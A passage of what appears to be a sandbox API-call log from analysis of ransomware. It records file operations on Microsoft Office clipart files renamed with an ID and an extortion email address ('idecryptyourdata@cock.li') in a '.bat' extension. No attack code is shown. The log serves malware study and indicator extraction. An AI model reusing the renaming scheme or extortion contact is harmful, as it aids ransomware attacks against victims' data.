liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.789] CloseHandle (hObject=0x50c) returned 1 [0162.791] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.791] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.791] CloseHandle (hObject=0x50c) returned 1 [0162.791] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.791] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.792] CloseHandle (hObject=0x50c) returned 1 [0162.792] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.792] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.793] CloseHandle (hObject=0x50c) returned 1 [0162.793] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.793] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.794] CloseHandle (hObject=0x50c) returned 1 [0162.795] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.795] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.796] CloseHandle (hObject=0x50c) returned 1 [0162.801] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.801] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.802] CloseHandle (hObject=0x50c) returned 1 [0162.803] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.803] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.803] CloseHandle (hObject=0x50c) returned 1 [0162.804] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.804] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.805] CloseHandle (hObject=0x50c) returned 1 [0162.806] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.807] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.807] CloseHandle (hObject=0x50c) returned 1 [0162.808] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.808] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.808] CloseHandle (hObject=0x50c) returned 1 [0162.809] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.810] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.810] CloseHandle (hObject=0x50c) returned 1 [0162.811] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.811] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.811] CloseHandle (hObject=0x50c) returned 1 [0162.812] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.812] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.812] CloseHandle (hObject=0x50c) returned 1 [0162.813] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.813] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.813] CloseHandle (hObject=0x50c) returned 1 [0162.814] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.815] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.815] CloseHandle (hObject=0x50c) returned 1 [0162.816] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.816] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.816] CloseHandle (hObject=0x50c) returned 1 [0162.821] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.821] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.822] CloseHandle (hObject=0x50c) returned 1 [0162.825] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.825] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.826] CloseHandle (hObject=0x50c) returned 1 [0162.827] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.827] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.827] CloseHandle (hObject=0x50c) returned 1 [0162.828] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.828] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.828] CloseHandle (hObject=0x50c) returned 1 [0162.829] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.829] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.830] CloseHandle (hObject=0x50c) returned 1 [0162.831] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.831] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.832] CloseHandle (hObject=0x50c) returned 1 [0162.833] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.833] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.833] CloseHandle (hObject=0x50c) returned 1 [0162.834] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.835] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.835] CloseHandle (hObject=0x50c) returned 1 [0162.836] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.836] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.837] CloseHandle (hObject=0x50c) returned 1 [0162.838] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.838] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.839] CloseHandle (hObject=0x50c) returned 1 [0162.841] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.841] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.841] CloseHandle (hObject=0x50c) returned 1 [0162.842] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.842] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.842] CloseHandle (hObject=0x50c) returned 1 [0162.843] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.844] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.844] CloseHandle (hObject=0x50c) returned 1 [0162.846] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.846] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.847] CloseHandle (hObject=0x50c) returned 1 [0162.848] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.848] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.849] CloseHandle (hObject=0x50c) returned 1 [0162.850] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.850] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, 